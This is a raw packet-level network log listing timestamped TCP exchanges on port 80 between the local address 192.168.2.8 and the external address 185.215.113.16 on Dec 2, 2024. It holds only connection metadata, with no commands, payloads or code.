                                                                                                                                                                                                        Dec 2, 2024 07:37:55.594224930 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.594331980 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.594404936 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.595324993 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.595388889 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.595429897 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.596394062 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.596517086 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.596556902 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.597480059 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.597592115 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.597649097 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.598572016 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.598640919 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.598680973 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.599659920 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.599790096 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.599848986 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.600820065 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.600938082 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.600999117 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.601875067 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.601972103 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.602015972 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.602919102 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.603007078 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.603041887 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.604007959 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.604126930 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.604186058 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.605104923 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.605240107 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.605298996 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.606223106 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.606431961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.606468916 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.607594013 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.607639074 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.607687950 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.608388901 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.608470917 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.608527899 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.609476089 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.609576941 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.609622002 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.610548019 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.610651970 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.610691071 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.611653090 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.611752987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.611793995 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.612732887 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.612853050 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.612910032 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.613809109 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.613924026 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.613976002 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.614911079 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.615024090 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.615083933 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.615989923 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.616097927 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.616142988 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.617079020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.617131948 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.617186069 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.618176937 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.618343115 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.618381977 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.619262934 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.619373083 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.619429111 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.620366096 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.620429993 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.620512962 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.621442080 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.621506929 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.621598959 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.622575998 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.622632027 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.622700930 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.623615026 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.623727083 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.623812914 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.624699116 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.624810934 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.624865055 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.625802994 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.625855923 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.625924110 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.626877069 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.626996994 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.627049923 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.627975941 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.628087997 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.628149986 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.629048109 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.629259109 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.629301071 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.630265951 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.630378008 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.630429029 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.631241083 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.631392956 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.631448030 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.632348061 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.632380009 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.632425070 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.633413076 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.633497953 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.633548975 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.634505987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.634609938 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.634653091 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.635627985 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.635674000 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.635720015 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.636661053 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.636773109 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.636852980 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.637767076 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.637887955 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.637950897 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.638851881 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.638961077 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.639010906 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.639983892 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.640084028 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.640139103 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.641032934 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.641134977 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.641180038 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.642121077 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.642194033 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.642251015 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.643227100 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.643301010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.643345118 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.765774012 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.765877008 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.765957117 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.766345978 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.766417027 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.766470909 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.767149925 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.767273903 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.767329931 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.768249035 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.768312931 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.768389940 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.791606903 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.791733980 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.791800976 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.792119026 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.792196035 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.792248964 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.792995930 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.793118000 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.793179989 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.794040918 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.794128895 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.794203043 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.795196056 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.795296907 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.795356989 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.796252966 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.796309948 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.796381950 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.797318935 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.797442913 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.797610998 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.798408985 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.798540115 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.798599005 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.799491882 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.799669027 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.799761057 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.800574064 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.800681114 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.800781965 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.801676035 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.801798105 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.801867008 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.802772999 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.802846909 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.802907944 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.803853035 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.803953886 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.804037094 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.804944038 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.805051088 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.805129051 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.806024075 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.806143045 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.806201935 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.807147026 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.807224035 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.807308912 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.808233976 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.808279991 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.808340073 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.809303045 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.809393883 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.809449911 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.810390949 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.810499907 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.810539961 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.811487913 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.811592102 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.811645985 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.812582970 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.812788963 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.812839031 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.813677073 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.813785076 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.813843012 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.814759970 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.814851999 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.814935923 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.815849066 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.815958023 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.816046000 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.816927910 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.817126036 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.817197084 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.818016052 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.818140030 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.818242073 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.819150925 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.819288969 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.819330931 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.820203066 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.820307016 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.820347071 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.821261883 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.821378946 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.821480036 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.822359085 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.822472095 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.822520971 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.823453903 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.823498964 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.823554993 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.824562073 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.824668884 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.824719906 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.825699091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.825839043 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.825896025 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.826740980 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.826894999 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.826978922 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.827836990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.827948093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.828016043 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.828927994 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.829039097 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.829091072 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.829992056 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.830094099 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.830168962 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.831082106 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.831284046 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.831331968 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.832190037 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.832266092 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.832321882 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.833266020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.833390951 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.833453894 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.834362984 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.834470987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.834542990 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.835427046 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.835541010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.835586071 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.836533070 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.836654902 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.836704969 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.837620020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.837687016 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.837788105 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.838727951 CET8049719185.215.113.16192.168.2.8
